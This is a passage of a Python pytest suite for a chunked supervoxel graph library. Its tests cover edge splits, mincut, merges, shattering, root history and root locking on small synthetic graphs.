cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, 1, 0, 0, 0) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
assert len(cgraph.get_latest_roots()) == 1
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_full_circle_to_triple_chain_disconnected_chunks(self, gen_graph):
"""
Remove direct edge between RG supervoxels 1 and 2, but leave indirect connection (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1━━┿━━━━━┿━━2 │ => │ 1 │ │ 2 │
│ ┗3━┿━━━━━┿━━┛ │ │ ┗3━┿━━━━━┿━━┛ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
loc = 2
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, loc, loc, loc, 0), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, loc, loc, loc, 0), 0.3)],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, loc, loc, loc, 0)],
edges=[(to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.3)],
timestamp=fake_timestamp)
for i_layer in range(3, 10):
if loc // 2**(i_layer - 3) == 1:
cgraph.add_layer(i_layer, np.array([[0, 0, 0], [1, 1, 1]]), time_stamp=fake_timestamp)
elif loc // 2**(i_layer - 3) == 0:
cgraph.add_layer(i_layer, np.array([[0, 0, 0]]), time_stamp=fake_timestamp)
else:
cgraph.add_layer(i_layer, np.array([[0, 0, 0]]), time_stamp=fake_timestamp)
cgraph.add_layer(i_layer, np.array([[loc // 2**(i_layer - 3), loc // 2**(i_layer - 3), loc // 2**(i_layer - 3)]]), time_stamp=fake_timestamp)
assert cgraph.get_root(to_label(cgraph, 1, loc, loc, loc, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
# Split
new_root_ids = cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, loc, loc, loc, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
# Check New State
assert len(new_root_ids) == 1
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_ids[0]
assert cgraph.get_root(to_label(cgraph, 1, loc, loc, loc, 0)) == new_root_ids[0]
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, loc, loc, loc, 0))
assert len(partners) == 1 and partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert len(partners) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in partners
assert to_label(cgraph, 1, loc, loc, loc, 0) in partners
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_ids[0]))
assert len(leaves) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
assert to_label(cgraph, 1, loc, loc, loc, 0) in leaves
# Check Old State still accessible
old_root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0), time_stamp=fake_timestamp)
assert new_root_ids[0] != old_root_id
assert len(cgraph.get_latest_roots()) == 1
assert len(cgraph.get_latest_roots(fake_timestamp)) == 1
@pytest.mark.timeout(30)
def test_split_same_node(self, gen_graph):
"""
Try to remove (non-existing) edge between RG supervoxel 1 and itself
┌─────┐
│ A¹ │
│ 1 │ => Reject
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_split_pair_abstract_nodes(self, gen_graph):
"""
Try to remove (non-existing) edge between RG supervoxel 1 and abstract node "2"
┌─────┐
│ B² │
│ "2" │
│ │
└─────┘
┌─────┐ => Reject
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Split
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges("Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 2, 1, 0, 0, 1), mincut=False)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_diagonal_connections(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 1, 1, 0, 0), inf),
(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
rr = cgraph.range_read_chunk(chunk_id=cgraph.get_chunk_id(layer=3, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
assert len(root_ids_t0) == 1
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(("root_id", root_id))
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
new_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 1),
mincut=False)
assert len(new_roots) == 2
assert cgraph.get_root(to_label(cgraph, 1, 1, 1, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 1, 0, 0))
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == \
cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
@pytest.mark.timeout(30)
def test_shatter(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
and edge between RG supervoxels 1 and 3 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 2━1━┿━━3 │
│ / │ │
┌─────┬─────┐
│ | │ │
│ 4━━┿━━5 │
│ C¹ │ D¹ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf),
(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk C
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 1, 1, 0, 0), .1),
(to_label(cgraph, 1, 0, 1, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
# Chunk D
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 1, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 1, 0, 0), to_label(cgraph, 1, 0, 1, 0, 0), .1)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [1, 1, 0]]))
new_root_ids = cgraph.shatter_nodes("Jane Doe", atomic_node_ids=[to_label(cgraph, 1, 0, 0, 0, 0)])
cgraph.logger.debug(new_root_ids)
assert len(new_root_ids) == 3
class TestGraphMergeSplit:
@pytest.mark.timeout(30)
def test_multiple_cuts_and_splits(self, gen_graph_simplequerytest):
"""
┌─────┬─────┬─────┐ L X Y Z S L X Y Z S L X Y Z S L X Y Z S
│ A¹ │ B¹ │ C¹ │ 1: 1 0 0 0 0 ─── 2 0 0 0 1 ─── 3 0 0 0 1 ─── 4 0 0 0 1
│ 1 │ 3━2━┿━━4 │ 2: 1 1 0 0 0 ─┬─ 2 1 0 0 1 ─── 3 0 0 0 2 ─┬─ 4 0 0 0 2
│ │ │ │ 3: 1 1 0 0 1 ─┘ │
└─────┴─────┴─────┘ 4: 1 2 0 0 0 ─── 2 2 0 0 1 ─── 3 1 0 0 1 ─┘
"""
cgraph = gen_graph_simplequerytest
rr = cgraph.range_read_chunk(chunk_id=cgraph.get_chunk_id(layer=4, x=0, y=0, z=0))
root_ids_t0 = list(rr.keys())
child_ids = []
for root_id in root_ids_t0:
cgraph.logger.debug(f"root_id {root_id}")
child_ids.extend(cgraph.get_subgraph_nodes(root_id))
for i in range(10):
cgraph.logger.debug(f"\n\nITERATION {i}/10")
cgraph.logger.debug("\n\nMERGE 1 & 3\n\n")
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)],
affinities=.9)
assert len(new_roots) == 1
assert len(cgraph.get_subgraph_nodes(new_roots[0])) == 4
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 1
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nSPLIT 2 & 3\n\n")
new_roots = cgraph.remove_edges("John Doe", to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1), mincut=False)
assert len(np.unique(new_roots)) == 2
for root in new_roots:
cgraph.logger.debug(("SUBGRAPH", cgraph.get_subgraph_nodes(root)))
cgraph.logger.debug("test children")
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), cgraph.get_segment_id(child_id), root_ids[-1]))
cgraph.logger.debug((cgraph.get_atomic_node_info(child_id)))
cgraph.logger.debug("test root")
u_root_ids = np.unique(root_ids)
these_child_ids = []
for root_id in u_root_ids:
these_child_ids.extend(cgraph.get_subgraph_nodes(root_id, verbose=False))
cgraph.logger.debug((root_id, cgraph.get_subgraph_nodes(root_id, verbose=False)))
assert len(these_child_ids) == 4
assert len(u_root_ids) == 2
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nSPLIT 1 & 3\n\n")
new_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1),
mincut=False)
assert len(new_roots) == 2
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 3
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nMERGE 2 & 3\n\n")
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)],
affinities=.9)
assert len(new_roots) == 1
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 2
for root_id in root_ids:
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
class TestGraphMinCut:
# TODO: Ideally, those tests should focus only on mincut retrieving the correct edges.
# The edge removal part should be tested exhaustively in TestGraphSplit
@pytest.mark.timeout(30)
def test_cut_regular_link(self, gen_graph):
"""
Regular link between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Mincut
new_root_ids = cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_cut_no_link(self, gen_graph):
"""
No connection between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Mincut
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_cut_old_link(self, gen_graph):
"""
Link between 1 and 2 got removed previously (aff = 0.0)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1┅┅╎┅┅2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.remove_edges("John Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Mincut
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_cut_indivisible_link(self, gen_graph):
"""
Sink: 1, Source: 2
Link between 1 and 2 is set to `inf` and must not be cut.
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1══╪══2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
original_parents_1 = cgraph.get_all_parents(
to_label(cgraph, 1, 0, 0, 0, 0))
original_parents_2 = cgraph.get_all_parents(
to_label(cgraph, 1, 1, 0, 0, 0))
# Mincut
assert cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2 * cgraph.chunk_size[0], 2 * cgraph.chunk_size[1],
cgraph.chunk_size[2]],
mincut=True) is None
new_parents_1 = cgraph.get_all_parents(to_label(cgraph, 1, 0, 0, 0, 0))
new_parents_2 = cgraph.get_all_parents(to_label(cgraph, 1, 1, 0, 0, 0))
assert np.all(np.array(original_parents_1) == np.array(new_parents_1))
assert np.all(np.array(original_parents_2) == np.array(new_parents_2))
class TestGraphMultiCut:
@pytest.mark.timeout(30)
def test_cut_multi_tree(self, gen_graph):
pass
class TestGraphHistory:
""" These test inadvertantly also test merge and split operations """
@pytest.mark.timeout(30)
def test_cut_merge_history(self, gen_graph):
"""
Regular link between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
(1) Split 1 and 2
(2) Merge 1 and 2
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
first_root = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
assert first_root == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
timestamp_before_split = datetime.utcnow()
split_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0),
mincut=False)
assert len(split_roots) == 2
timestamp_after_split = datetime.utcnow()
merge_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)],
affinities=.4)
assert len(merge_roots) == 1
merge_root = merge_roots[0]
timestamp_after_merge = datetime.utcnow()
assert len(cgraph.get_root_id_history(first_root,
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 4
assert len(cgraph.get_root_id_history(split_roots[0],
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 3
assert len(cgraph.get_root_id_history(split_roots[1],
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 3
assert len(cgraph.get_root_id_history(merge_root,
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 4
new_roots, old_roots = cgraph.get_delta_roots(timestamp_before_split,
timestamp_after_split)
assert(len(old_roots)==1)
assert(old_roots[0]==first_root)
assert(len(new_roots)==2)
assert(np.all(np.isin(new_roots, split_roots)))
new_roots2, old_roots2 = cgraph.get_delta_roots(timestamp_after_split,
timestamp_after_merge)
assert(len(new_roots2)==1)
assert(new_roots2[0]==merge_root)
assert(len(old_roots2)==2)
assert(np.all(np.isin(old_roots2, split_roots)))
new_roots3, old_roots3 = cgraph.get_delta_roots(timestamp_before_split,
timestamp_after_merge)
assert(len(new_roots3)==1)
assert(new_roots3[0]==merge_root)
assert(len(old_roots3)==1)
assert(old_roots3[0]==first_root)
class TestGraphLocks:
@pytest.mark.timeout(30)
def test_lock_unlock(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try unlock (opid = 1)
(4) Try lock (opid = 2)
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
operation_id_2 = cgraph.get_unique_operation_id()
assert not cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
assert cgraph.unlock_root(root_id=root_id,
operation_id=operation_id_1)
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
@pytest.mark.timeout(30)
def test_lock_expiration(self, gen_graph, lock_expired_timedelta_override):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try lock (opid = 2) with retries
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
operation_id_2 = cgraph.get_unique_operation_id()
assert not cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2,
max_tries=10, waittime_s=.5)[0]
@pytest.mark.timeout(30)
def test_lock_renew(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try lock (opid = 2) with retries
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
